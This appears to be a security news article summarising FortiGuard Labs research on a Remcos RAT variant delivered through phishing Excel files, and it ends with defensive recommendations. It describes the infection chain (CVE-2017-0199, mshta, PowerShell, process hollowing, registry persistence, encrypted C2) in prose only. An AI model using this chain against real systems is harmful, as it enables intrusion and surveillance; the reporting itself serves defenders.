A new variant of the Remcos RAT malware, capable of taking complete control over a victim’s device, has been uncovered in a recent phishing campaign targeting Windows users.
Discovered by Fortinet’s FortiGuard Labs, this campaign uses a phishing email with a malicious Excel attachment to deliver the malware to victims, exploiting an existing vulnerability to execute its code stealthily.
Once opened, the Excel file exploits the CVE-2017-0199 vulnerability, allowing it to download an HTML Application (HTA) file. The HTA file is loaded using Microsoft’s mshta.exe, then calls various scripts to download an executable file named “dllhost.exe.” This file, loaded onto the victim’s device, enables the installation of the Remcos RAT, allowing cybercriminals to remotely control infected systems.
Layers of Obfuscation in Remcos RAT
The Remcos RAT variant leverages multiple layers of obfuscation to avoid detection. It wraps its malicious code in various encoding methods, including JavaScript, VBScript and PowerShell, which conceal the actual payload.
Once dllhost.exe is running, it executes PowerShell commands to launch additional files hidden in the victim’s device, further embedding the malicious program within the system. This variant’s complexity is enhanced by anti-analysis techniques that hide it from security programs and make detection challenging.
Among these anti-analysis techniques are vectored exception handlers, dynamic API retrievals and encoded constants that resist static code analysis.
The malware also performs a technique called “process hollowing,” transferring its malicious code to a suspended process that appears harmless but continues executing the malware in the background.
Remcos RAT Advanced Control Features
Remcos RAT enables attackers to maintain long-term control over compromised devices. The malware uses registry entries to remain persistent even after the device is restarted. Once fully installed, it communicates with a command-and-control (C2) server, receiving instructions for various operations, including keylogging, remote screenshots and audio recording.
The malware uses an encrypted configuration block, which it decrypts to determine its actions on a victim’s device. This setting block includes the IP address and port of the C2 server, and various commands that activate specific capabilities within Remcos, such as monitoring system processes and retrieving device data.
Each command is encrypted for security and decrypted only when needed, making it challenging for researchers to intercept or decode.
In addition to monitoring, Remcos RAT collects device information and user activity, which it encrypts and sends back to its C2 server. This communication relies on secure TLS, further obfuscating the data and maintaining a robust connection with the attackers.
To protect against malware like Remcos RAT, companies should use updated antivirus and anti-malware software to block malicious signatures, employ web filtering to prevent access to dangerous URLs and activate spam filters to catch phishing attempts.
Keeping all software patched to avoid known vulnerabilities and using intrusion prevention systems (IPS) and content disarm tools (CDR) is also advised for additional security. Finally, regular cybersecurity training for all users can help identify and avoid phishing schemes.
Image credit: Diego Thomazini / Shutterstock.com